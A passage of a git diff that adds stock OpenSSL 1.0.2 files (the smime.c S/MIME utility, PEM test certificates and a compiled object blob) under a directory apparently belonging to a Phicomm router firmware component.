+ndL5lb6UBhhA0kTzEYA38+HtBxPe/lokCv0bYfyWY9asUmvfbUrTYta0yjN7ixnV
+UqvxxHQHOAwhf6bcc7xNHapOxloWzGUU0RQ=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_root.pem
new file mode 100644
index 0000000..8dd104f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_root.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDZzCCAk+gAwIBAgIgVqenwCYvmmxUIvi9gUMCa+uJGJ60mZecw9HrISXnLaYw
+DQYJKoZIhvcNAQEFBQAwIzELMAkGA1UEBhMCVVMxFDASBgNVBAoTC1JDQTEwMTEx
+ODI5MB4XDTk2MTAxMjAwMDAwMFoXDTk2MTExMTIzNTk1OVowIzELMAkGA1UEBhMC
+VVMxFDASBgNVBAoTC1JDQTEwMTExODI5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
+MIIBCgKCAQEAukca0PVUGFIYX7EyrShi+dVi9GTNzG0V2Wtdw6DqFzKfedba/KpE
+zqnRDV/wRZlBn3oXPS6kNCFiBPRV9mEFXI7y2W+q8/vPurjRDIXMsqQ+dAhKwf4q
+rofJBTiET4NUN0YTtpx6aYuoVubjiOgKdbqnUArxAWWP2Dkco17ipEYyUtd4sTAe
+/xKR02AHpbYGYPSHjMDS/nzUJ7uX4d51phs0rt7If48ExJSnDV/KoHMfm42mdmH2
+g23005qdHKY3UXeh10tZmb3QtGTSvF6OqpRZ+e9/ALklu7ZcIjqbb944ci4QWemb
+ZNWiDFrWWUoO1k942BI/iZ8Fh8pETYSDBQIDAQABo4GGMIGDMA4GA1UdDwEB/wQE
+AwIBBjAuBgNVHRABAf8EJDAigA8xOTk2MTAxMjAxMzQwMFqBDzE5OTYxMTExMjM1
+OTU5WjAbBgNVHSABAf8EETAPMA0GC2CGSAGG+EUBBwEBMBIGA1UdEwEB/wQIMAYB
+Af8CAQIwEAYEho1vAwEB/wQFAwMHAIAwDQYJKoZIhvcNAQEFBQADggEBAK4tntea
+y+ws7PdULwfqAS5osaoNvw73uBn5lROTpx91uhQbJyf0oZ3XG9GUuHZBpqG9qmr9
+vIL40RsvRpNMYgaNHKTxF716yx6rZmruAYZsrE3SpV63tQJCckKLPSge2E5uDhSQ
+O8UjusG+IRT9fKMXUHLv4OmZPOQVOSl1qTCN2XoJFqEPtC3Y9P4YR4xHL0P2jb1l
+DLdIbruuh+6omH+0XUZd5fKnQZTTi6gjl0iunj3wGnkcqGZtwr3j87ONiB/8tDwY
+vz8ceII4YYdX12PrNzn+fu3R5rChvPW4/ah/SaYQ2VQ0AupaIF4xrNJ/gLYYw0YO
+bxCrVJLd8tu9WgA=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/smime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/smime.c
new file mode 100644
index 0000000..764509f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/smime.c
@@ -0,0 +1,776 @@
+/* smime.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* S/MIME utility function */
+
+#include <stdio.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/crypto.h>
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/x509_vfy.h>
+#include <openssl/x509v3.h>
+
+#undef PROG
+#define PROG smime_main
+static int save_certs(char *signerfile, STACK_OF(X509) *signers);
+static int smime_cb(int ok, X509_STORE_CTX *ctx);
+
+#define SMIME_OP        0x10
+#define SMIME_IP        0x20
+#define SMIME_SIGNERS   0x40
+#define SMIME_ENCRYPT   (1 | SMIME_OP)
+#define SMIME_DECRYPT   (2 | SMIME_IP)
+#define SMIME_SIGN      (3 | SMIME_OP | SMIME_SIGNERS)
+#define SMIME_VERIFY    (4 | SMIME_IP)
+#define SMIME_PK7OUT    (5 | SMIME_IP | SMIME_OP)
+#define SMIME_RESIGN    (6 | SMIME_IP | SMIME_OP | SMIME_SIGNERS)
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    int operation = 0;
+    int ret = 0;
+    char **args;
+    const char *inmode = "r", *outmode = "w";
+    char *infile = NULL, *outfile = NULL;
+    char *signerfile = NULL, *recipfile = NULL;
+    STACK_OF(OPENSSL_STRING) *sksigners = NULL, *skkeys = NULL;
+    char *certfile = NULL, *keyfile = NULL, *contfile = NULL;
+    const EVP_CIPHER *cipher = NULL;
+    PKCS7 *p7 = NULL;
+    X509_STORE *store = NULL;
+    X509 *cert = NULL, *recip = NULL, *signer = NULL;
+    EVP_PKEY *key = NULL;
+    STACK_OF(X509) *encerts = NULL, *other = NULL;
+    BIO *in = NULL, *out = NULL, *indata = NULL;
+    int badarg = 0;
+    int flags = PKCS7_DETACHED;
+    char *to = NULL, *from = NULL, *subject = NULL;
+    char *CAfile = NULL, *CApath = NULL;
+    char *passargin = NULL, *passin = NULL;
+    char *inrand = NULL;
+    int need_rand = 0;
+    int indef = 0;
+    const EVP_MD *sign_md = NULL;
+    int informat = FORMAT_SMIME, outformat = FORMAT_SMIME;
+    int keyform = FORMAT_PEM;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+
+    X509_VERIFY_PARAM *vpm = NULL;
+
+    args = argv + 1;
+    ret = 1;
+
+    apps_startup();
+
+    if (bio_err == NULL) {
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+    }
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-encrypt"))
+            operation = SMIME_ENCRYPT;
+        else if (!strcmp(*args, "-decrypt"))
+            operation = SMIME_DECRYPT;
+        else if (!strcmp(*args, "-sign"))
+            operation = SMIME_SIGN;
+        else if (!strcmp(*args, "-resign"))
+            operation = SMIME_RESIGN;
+        else if (!strcmp(*args, "-verify"))
+            operation = SMIME_VERIFY;
+        else if (!strcmp(*args, "-pk7out"))
+            operation = SMIME_PK7OUT;
+#ifndef OPENSSL_NO_DES
+        else if (!strcmp(*args, "-des3"))
+            cipher = EVP_des_ede3_cbc();
+        else if (!strcmp(*args, "-des"))
+            cipher = EVP_des_cbc();
+#endif
+#ifndef OPENSSL_NO_SEED
+        else if (!strcmp(*args, "-seed"))
+            cipher = EVP_seed_cbc();
+#endif
+#ifndef OPENSSL_NO_RC2
+        else if (!strcmp(*args, "-rc2-40"))
+            cipher = EVP_rc2_40_cbc();
+        else if (!strcmp(*args, "-rc2-128"))
+            cipher = EVP_rc2_cbc();
+        else if (!strcmp(*args, "-rc2-64"))
+            cipher = EVP_rc2_64_cbc();
+#endif
+#ifndef OPENSSL_NO_AES
+        else if (!strcmp(*args, "-aes128"))
+            cipher = EVP_aes_128_cbc();
+        else if (!strcmp(*args, "-aes192"))
+            cipher = EVP_aes_192_cbc();
+        else if (!strcmp(*args, "-aes256"))
+            cipher = EVP_aes_256_cbc();
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+        else if (!strcmp(*args, "-camellia128"))
+            cipher = EVP_camellia_128_cbc();
+        else if (!strcmp(*args, "-camellia192"))
+            cipher = EVP_camellia_192_cbc();
+        else if (!strcmp(*args, "-camellia256"))
+            cipher = EVP_camellia_256_cbc();
+#endif
+        else if (!strcmp(*args, "-text"))
+            flags |= PKCS7_TEXT;
+        else if (!strcmp(*args, "-nointern"))
+            flags |= PKCS7_NOINTERN;
+        else if (!strcmp(*args, "-noverify"))
+            flags |= PKCS7_NOVERIFY;
+        else if (!strcmp(*args, "-nochain"))
+            flags |= PKCS7_NOCHAIN;
+        else if (!strcmp(*args, "-nocerts"))
+            flags |= PKCS7_NOCERTS;
+        else if (!strcmp(*args, "-noattr"))
+            flags |= PKCS7_NOATTR;
+        else if (!strcmp(*args, "-nodetach"))
+            flags &= ~PKCS7_DETACHED;
+        else if (!strcmp(*args, "-nosmimecap"))
+            flags |= PKCS7_NOSMIMECAP;
+        else if (!strcmp(*args, "-binary"))
+            flags |= PKCS7_BINARY;
+        else if (!strcmp(*args, "-nosigs"))
+            flags |= PKCS7_NOSIGS;
+        else if (!strcmp(*args, "-stream"))
+            indef = 1;
+        else if (!strcmp(*args, "-indef"))
+            indef = 1;
+        else if (!strcmp(*args, "-noindef"))
+            indef = 0;
+        else if (!strcmp(*args, "-nooldmime"))
+            flags |= PKCS7_NOOLDMIMETYPE;
+        else if (!strcmp(*args, "-crlfeol"))
+            flags |= PKCS7_CRLFEOL;
+        else if (!strcmp(*args, "-rand")) {
+            if (!args[1])
+                goto argerr;
+            args++;
+            inrand = *args;
+            need_rand = 1;
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (!strcmp(*args, "-engine")) {
+            if (!args[1])
+                goto argerr;
+            engine = *++args;
+        }
+#endif
+        else if (!strcmp(*args, "-passin")) {
+            if (!args[1])
+                goto argerr;
+            passargin = *++args;
+        } else if (!strcmp(*args, "-to")) {
+            if (!args[1])
+                goto argerr;
+            to = *++args;
+        } else if (!strcmp(*args, "-from")) {
+            if (!args[1])
+                goto argerr;
+            from = *++args;
+        } else if (!strcmp(*args, "-subject")) {
+            if (!args[1])
+                goto argerr;
+            subject = *++args;
+        } else if (!strcmp(*args, "-signer")) {
+            if (!args[1])
+                goto argerr;
+            /* If previous -signer argument add signer to list */
+
+            if (signerfile) {
+                if (!sksigners)
+                    sksigners = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(sksigners, signerfile);
+                if (!keyfile)
+                    keyfile = signerfile;
+                if (!skkeys)
+                    skkeys = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(skkeys, keyfile);
+                keyfile = NULL;
+            }
+            signerfile = *++args;
+        } else if (!strcmp(*args, "-recip")) {
+            if (!args[1])
+                goto argerr;
+            recipfile = *++args;
+        } else if (!strcmp(*args, "-md")) {
+            if (!args[1])
+                goto argerr;
+            sign_md = EVP_get_digestbyname(*++args);
+            if (sign_md == NULL) {
+                BIO_printf(bio_err, "Unknown digest %s\n", *args);
+                goto argerr;
+            }
+        } else if (!strcmp(*args, "-inkey")) {
+            if (!args[1])
+                goto argerr;
+            /* If previous -inkey arument add signer to list */
+            if (keyfile) {
+                if (!signerfile) {
+                    BIO_puts(bio_err, "Illegal -inkey without -signer\n");
+                    goto argerr;
+                }
+                if (!sksigners)
+                    sksigners = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(sksigners, signerfile);
+                signerfile = NULL;
+                if (!skkeys)
+                    skkeys = sk_OPENSSL_STRING_new_null();
+                sk_OPENSSL_STRING_push(skkeys, keyfile);
+            }
+            keyfile = *++args;
+        } else if (!strcmp(*args, "-keyform")) {
+            if (!args[1])
+                goto argerr;
+            keyform = str2fmt(*++args);
+        } else if (!strcmp(*args, "-certfile")) {
+            if (!args[1])
+                goto argerr;
+            certfile = *++args;
+        } else if (!strcmp(*args, "-CAfile")) {
+            if (!args[1])
+                goto argerr;
+            CAfile = *++args;
+        } else if (!strcmp(*args, "-CApath")) {
+            if (!args[1])
+                goto argerr;
+            CApath = *++args;
+        } else if (!strcmp(*args, "-in")) {
+            if (!args[1])
+                goto argerr;
+            infile = *++args;
+        } else if (!strcmp(*args, "-inform")) {
+            if (!args[1])
+                goto argerr;
+            informat = str2fmt(*++args);
+        } else if (!strcmp(*args, "-outform")) {
+            if (!args[1])
+                goto argerr;
+            outformat = str2fmt(*++args);
+        } else if (!strcmp(*args, "-out")) {
+            if (!args[1])
+                goto argerr;
+            outfile = *++args;
+        } else if (!strcmp(*args, "-content")) {
+            if (!args[1])
+                goto argerr;
+            contfile = *++args;
+        } else if (args_verify(&args, NULL, &badarg, bio_err, &vpm))
+            continue;
+        else if ((cipher = EVP_get_cipherbyname(*args + 1)) == NULL)
+            badarg = 1;
+        args++;
+    }
+
+    if (!(operation & SMIME_SIGNERS) && (skkeys || sksigners)) {
+        BIO_puts(bio_err, "Multiple signers or keys not allowed\n");
+        goto argerr;
+    }
+
+    if (operation & SMIME_SIGNERS) {
+        /* Check to see if any final signer needs to be appended */
+        if (keyfile && !signerfile) {
+            BIO_puts(bio_err, "Illegal -inkey without -signer\n");
+            goto argerr;
+        }
+        if (signerfile) {
+            if (!sksigners)
+                sksigners = sk_OPENSSL_STRING_new_null();
+            sk_OPENSSL_STRING_push(sksigners, signerfile);
+            if (!skkeys)
+                skkeys = sk_OPENSSL_STRING_new_null();
+            if (!keyfile)
+                keyfile = signerfile;
+            sk_OPENSSL_STRING_push(skkeys, keyfile);
+        }
+        if (!sksigners) {
+            BIO_printf(bio_err, "No signer certificate specified\n");
+            badarg = 1;
+        }
+        signerfile = NULL;
+        keyfile = NULL;
+        need_rand = 1;
+    } else if (operation == SMIME_DECRYPT) {
+        if (!recipfile && !keyfile) {
+            BIO_printf(bio_err,
+                       "No recipient certificate or key specified\n");
+            badarg = 1;
+        }
+    } else if (operation == SMIME_ENCRYPT) {
+        if (!*args) {
+            BIO_printf(bio_err, "No recipient(s) certificate(s) specified\n");
+            badarg = 1;
+        }
+        need_rand = 1;
+    } else if (!operation)
+        badarg = 1;
+
+    if (badarg) {
+ argerr:
+        BIO_printf(bio_err, "Usage smime [options] cert.pem ...\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-encrypt       encrypt message\n");
+        BIO_printf(bio_err, "-decrypt       decrypt encrypted message\n");
+        BIO_printf(bio_err, "-sign          sign message\n");
+        BIO_printf(bio_err, "-verify        verify signed message\n");
+        BIO_printf(bio_err, "-pk7out        output PKCS#7 structure\n");
+#ifndef OPENSSL_NO_DES
+        BIO_printf(bio_err, "-des3          encrypt with triple DES\n");
+        BIO_printf(bio_err, "-des           encrypt with DES\n");
+#endif
+#ifndef OPENSSL_NO_SEED
+        BIO_printf(bio_err, "-seed          encrypt with SEED\n");
+#endif
+#ifndef OPENSSL_NO_RC2
+        BIO_printf(bio_err, "-rc2-40        encrypt with RC2-40 (default)\n");
+        BIO_printf(bio_err, "-rc2-64        encrypt with RC2-64\n");
+        BIO_printf(bio_err, "-rc2-128       encrypt with RC2-128\n");
+#endif
+#ifndef OPENSSL_NO_AES
+        BIO_printf(bio_err, "-aes128, -aes192, -aes256\n");
+        BIO_printf(bio_err,
+                   "               encrypt PEM output with cbc aes\n");
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+        BIO_printf(bio_err, "-camellia128, -camellia192, -camellia256\n");
+        BIO_printf(bio_err,
+                   "               encrypt PEM output with cbc camellia\n");
+#endif
+        BIO_printf(bio_err,
+                   "-nointern      don't search certificates in message for signer\n");
+        BIO_printf(bio_err,
+                   "-nosigs        don't verify message signature\n");
+        BIO_printf(bio_err,
+                   "-noverify      don't verify signers certificate\n");
+        BIO_printf(bio_err,
+                   "-nocerts       don't include signers certificate when signing\n");
+        BIO_printf(bio_err, "-nodetach      use opaque signing\n");
+        BIO_printf(bio_err,
+                   "-noattr        don't include any signed attributes\n");
+        BIO_printf(bio_err,
+                   "-binary        don't translate message to text\n");
+        BIO_printf(bio_err, "-certfile file other certificates file\n");
+        BIO_printf(bio_err, "-signer file   signer certificate file\n");
+        BIO_printf(bio_err,
+                   "-recip  file   recipient certificate file for decryption\n");
+        BIO_printf(bio_err, "-in file       input file\n");
+        BIO_printf(bio_err,
+                   "-inform arg    input format SMIME (default), PEM or DER\n");
+        BIO_printf(bio_err,
+                   "-inkey file    input private key (if not signer or recipient)\n");
+        BIO_printf(bio_err,
+                   "-keyform arg   input private key format (PEM or ENGINE)\n");
+        BIO_printf(bio_err, "-out file      output file\n");
+        BIO_printf(bio_err,
+                   "-outform arg   output format SMIME (default), PEM or DER\n");
+        BIO_printf(bio_err,
+                   "-content file  supply or override content for detached signature\n");
+        BIO_printf(bio_err, "-to addr       to address\n");
+        BIO_printf(bio_err, "-from ad       from address\n");
+        BIO_printf(bio_err, "-subject s     subject\n");
+        BIO_printf(bio_err,
+                   "-text          include or delete text MIME headers\n");
+        BIO_printf(bio_err,
+                   "-CApath dir    trusted certificates directory\n");
+        BIO_printf(bio_err, "-CAfile file   trusted certificates file\n");
+        BIO_printf(bio_err,
+                   "-crl_check     check revocation status of signer's certificate using CRLs\n");
+        BIO_printf(bio_err,
+                   "-crl_check_all check revocation status of signer's certificate chain using CRLs\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e      use engine e, possibly a hardware device.\n");
+#endif
+        BIO_printf(bio_err, "-passin arg    input file pass phrase source\n");
+        BIO_printf(bio_err, "-rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "               load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "               the random number generator\n");
+        BIO_printf(bio_err,
+                   "cert.pem       recipient certificate(s) for encryption\n");
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    if (!app_passwd(bio_err, passargin, NULL, &passin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    if (need_rand) {
+        app_RAND_load_file(NULL, bio_err, (inrand != NULL));
+        if (inrand != NULL)
+            BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                       app_RAND_load_files(inrand));
+    }
+
+    ret = 2;
+
+    if (!(operation & SMIME_SIGNERS))
+        flags &= ~PKCS7_DETACHED;
+
+    if (operation & SMIME_OP) {
+        if (outformat == FORMAT_ASN1)
+            outmode = "wb";
+    } else {
+        if (flags & PKCS7_BINARY)
+            outmode = "wb";
+    }
+
+    if (operation & SMIME_IP) {
+        if (informat == FORMAT_ASN1)
+            inmode = "rb";
+    } else {
+        if (flags & PKCS7_BINARY)
+            inmode = "rb";
+    }
+
+    if (operation == SMIME_ENCRYPT) {
+        if (!cipher) {
+#ifndef OPENSSL_NO_DES
+            cipher = EVP_des_ede3_cbc();
+#else
+            BIO_printf(bio_err, "No cipher selected\n");
+            goto end;
+#endif
+        }
+        encerts = sk_X509_new_null();
+        while (*args) {
+            if (!(cert = load_cert(bio_err, *args, FORMAT_PEM,
+                                   NULL, e, "recipient certificate file"))) {
+#if 0                           /* An appropriate message is already printed */
+                BIO_printf(bio_err,
+                           "Can't read recipient certificate file %s\n",
+                           *args);
+#endif
+                goto end;
+            }
+            sk_X509_push(encerts, cert);
+            cert = NULL;
+            args++;
+        }
+    }
+
+    if (certfile) {
+        if (!(other = load_certs(bio_err, certfile, FORMAT_PEM, NULL,
+                                 e, "certificate file"))) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (recipfile && (operation == SMIME_DECRYPT)) {
+        if (!(recip = load_cert(bio_err, recipfile, FORMAT_PEM, NULL,
+                                e, "recipient certificate file"))) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (operation == SMIME_DECRYPT) {
+        if (!keyfile)
+            keyfile = recipfile;
+    } else if (operation == SMIME_SIGN) {
+        if (!keyfile)
+            keyfile = signerfile;
+    } else
+        keyfile = NULL;
+
+    if (keyfile) {
+        key = load_key(bio_err, keyfile, keyform, 0, passin, e,
+                       "signing key file");
+        if (!key)
+            goto end;
+    }
+
+    if (infile) {
+        if (!(in = BIO_new_file(infile, inmode))) {
+            BIO_printf(bio_err, "Can't open input file %s\n", infile);
+            goto end;
+        }
+    } else
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+
+    if (operation & SMIME_IP) {
+        if (informat == FORMAT_SMIME)
+            p7 = SMIME_read_PKCS7(in, &indata);
+        else if (informat == FORMAT_PEM)
+            p7 = PEM_read_bio_PKCS7(in, NULL, NULL, NULL);
+        else if (informat == FORMAT_ASN1)
+            p7 = d2i_PKCS7_bio(in, NULL);
+        else {
+            BIO_printf(bio_err, "Bad input format for PKCS#7 file\n");
+            goto end;
+        }
+
+        if (!p7) {
+            BIO_printf(bio_err, "Error reading S/MIME message\n");
+            goto end;
+        }
+        if (contfile) {
+            BIO_free(indata);
+            if (!(indata = BIO_new_file(contfile, "rb"))) {
+                BIO_printf(bio_err, "Can't read content file %s\n", contfile);
+                goto end;
+            }
+        }
+    }
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, outmode))) {
+            BIO_printf(bio_err, "Can't open output file %s\n", outfile);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+
+    if (operation == SMIME_VERIFY) {
+        if (!(store = setup_verify(bio_err, CAfile, CApath)))
+            goto end;
+        X509_STORE_set_verify_cb(store, smime_cb);
+        if (vpm)
+            X509_STORE_set1_param(store, vpm);
+    }
+
+    ret = 3;
+
+    if (operation == SMIME_ENCRYPT) {
+        if (indef)
+            flags |= PKCS7_STREAM;
+        p7 = PKCS7_encrypt(encerts, in, cipher, flags);
+    } else if (operation & SMIME_SIGNERS) {
+        int i;
+        /*
+         * If detached data content we only enable streaming if S/MIME output
+         * format.
+         */
+        if (operation == SMIME_SIGN) {
+            if (flags & PKCS7_DETACHED) {
+                if (outformat == FORMAT_SMIME)
+                    flags |= PKCS7_STREAM;
+            } else if (indef)
+                flags |= PKCS7_STREAM;
+            flags |= PKCS7_PARTIAL;
+            p7 = PKCS7_sign(NULL, NULL, other, in, flags);
+            if (!p7)
+                goto end;
+            if (flags & PKCS7_NOCERTS) {
+                for (i = 0; i < sk_X509_num(other); i++) {
+                    X509 *x = sk_X509_value(other, i);
+                    PKCS7_add_certificate(p7, x);
+                }
+            }
+        } else
+            flags |= PKCS7_REUSE_DIGEST;
+        for (i = 0; i < sk_OPENSSL_STRING_num(sksigners); i++) {
+            signerfile = sk_OPENSSL_STRING_value(sksigners, i);
+            keyfile = sk_OPENSSL_STRING_value(skkeys, i);
+            signer = load_cert(bio_err, signerfile, FORMAT_PEM, NULL,
+                               e, "signer certificate");
+            if (!signer)
+                goto end;
+            key = load_key(bio_err, keyfile, keyform, 0, passin, e,
+                           "signing key file");
+            if (!key)
+                goto end;
+            if (!PKCS7_sign_add_signer(p7, signer, key, sign_md, flags))
+                goto end;
+            X509_free(signer);
+            signer = NULL;
+            EVP_PKEY_free(key);
+            key = NULL;
+        }
+        /* If not streaming or resigning finalize structure */
+        if ((operation == SMIME_SIGN) && !(flags & PKCS7_STREAM)) {
+            if (!PKCS7_final(p7, in, flags))
+                goto end;
+        }
+    }
+
+    if (!p7) {
+        BIO_printf(bio_err, "Error creating PKCS#7 structure\n");
+        goto end;
+    }
+
+    ret = 4;
+    if (operation == SMIME_DECRYPT) {
+        if (!PKCS7_decrypt(p7, key, recip, out, flags)) {
+            BIO_printf(bio_err, "Error decrypting PKCS#7 structure\n");
+            goto end;
+        }
+    } else if (operation == SMIME_VERIFY) {
+        STACK_OF(X509) *signers;
+        if (PKCS7_verify(p7, other, store, indata, out, flags))
+            BIO_printf(bio_err, "Verification successful\n");
+        else {
+            BIO_printf(bio_err, "Verification failure\n");
+            goto end;
+        }
+        signers = PKCS7_get0_signers(p7, other, flags);
+        if (!save_certs(signerfile, signers)) {
+            BIO_printf(bio_err, "Error writing signers to %s\n", signerfile);
+            ret = 5;
+            goto end;
+        }
+        sk_X509_free(signers);
+    } else if (operation == SMIME_PK7OUT)
+        PEM_write_bio_PKCS7(out, p7);
+    else {
+        if (to)
+            BIO_printf(out, "To: %s\n", to);
+        if (from)
+            BIO_printf(out, "From: %s\n", from);
+        if (subject)
+            BIO_printf(out, "Subject: %s\n", subject);
+        if (outformat == FORMAT_SMIME) {
+            if (operation == SMIME_RESIGN)
+                SMIME_write_PKCS7(out, p7, indata, flags);
+            else
+                SMIME_write_PKCS7(out, p7, in, flags);
+        } else if (outformat == FORMAT_PEM)
+            PEM_write_bio_PKCS7_stream(out, p7, in, flags);
+        else if (outformat == FORMAT_ASN1)
+            i2d_PKCS7_bio_stream(out, p7, in, flags);
+        else {
+            BIO_printf(bio_err, "Bad output format for PKCS#7 file\n");
+            goto end;
+        }
+    }
+    ret = 0;
+ end:
+    if (need_rand)
+        app_RAND_write_file(NULL, bio_err);
+    if (ret)
+        ERR_print_errors(bio_err);
+    sk_X509_pop_free(encerts, X509_free);
+    sk_X509_pop_free(other, X509_free);
+    if (vpm)
+        X509_VERIFY_PARAM_free(vpm);
+    if (sksigners)
+        sk_OPENSSL_STRING_free(sksigners);
+    if (skkeys)
+        sk_OPENSSL_STRING_free(skkeys);
+    X509_STORE_free(store);
+    X509_free(cert);
+    X509_free(recip);
+    X509_free(signer);
+    EVP_PKEY_free(key);
+    PKCS7_free(p7);
+    BIO_free(in);
+    BIO_free(indata);
+    BIO_free_all(out);
+    if (passin)
+        OPENSSL_free(passin);
+    return (ret);
+}
+
+static int save_certs(char *signerfile, STACK_OF(X509) *signers)
+{
+    int i;
+    BIO *tmp;
+    if (!signerfile)
+        return 1;
+    tmp = BIO_new_file(signerfile, "w");
+    if (!tmp)
+        return 0;
+    for (i = 0; i < sk_X509_num(signers); i++)
+        PEM_write_bio_X509(tmp, sk_X509_value(signers, i));
+    BIO_free(tmp);
+    return 1;
+}
+
+/* Minimal callback just to output policy info (if any) */
+
+static int smime_cb(int ok, X509_STORE_CTX *ctx)
+{
+    int error;
+
+    error = X509_STORE_CTX_get_error(ctx);
+
+    if ((error != X509_V_ERR_NO_EXPLICIT_POLICY)
+        && ((error != X509_V_OK) || (ok != 2)))
+        return ok;
+
+    policies_print(NULL, ctx);
+
+    return ok;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/smime.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/smime.o
new file mode 100644
index 0000000000000000000000000000000000000000..8a946c5f19af3d8f8e0c761c5372d1eb69f71126
GIT binary patch
literal 29288
zcmeI4dwi7Do&O&Qfq<9<SAlx#6oUjcF_VN`6or8V1`QCo30^u3$%IUqWa3;vycJ7g
zoeikfTCBa<Eo-e->jk@3sb<j?sNLeyZkKJlTeh|8G}6|#BDSvlzTfXTXY!fD9Dmz=
z?SH$^>oqgyd7sbuocnpM$tPRe7K|P>$}`(2?^17M&rr{Mvv(vsSAuiBQtxE%4`pZn
zDX=1tc|VwWH@Nk!@?a)aQSv4Wf`b&=dhGnvgn^;-$$_o!k4}&CA6HRZUn+0O91dLb
zq9ngExb@|d7fz-$fmMN(ffXy42XB3gg`L5{G1DvAE7M<bh<^P;!OX6TXDIYM7c#iF
zzha1fd86Pi6%xD;!msME&ifMCP1ma3%wGLl%s80Y8ypx)O%4unalB{C>FfDV(3cVo
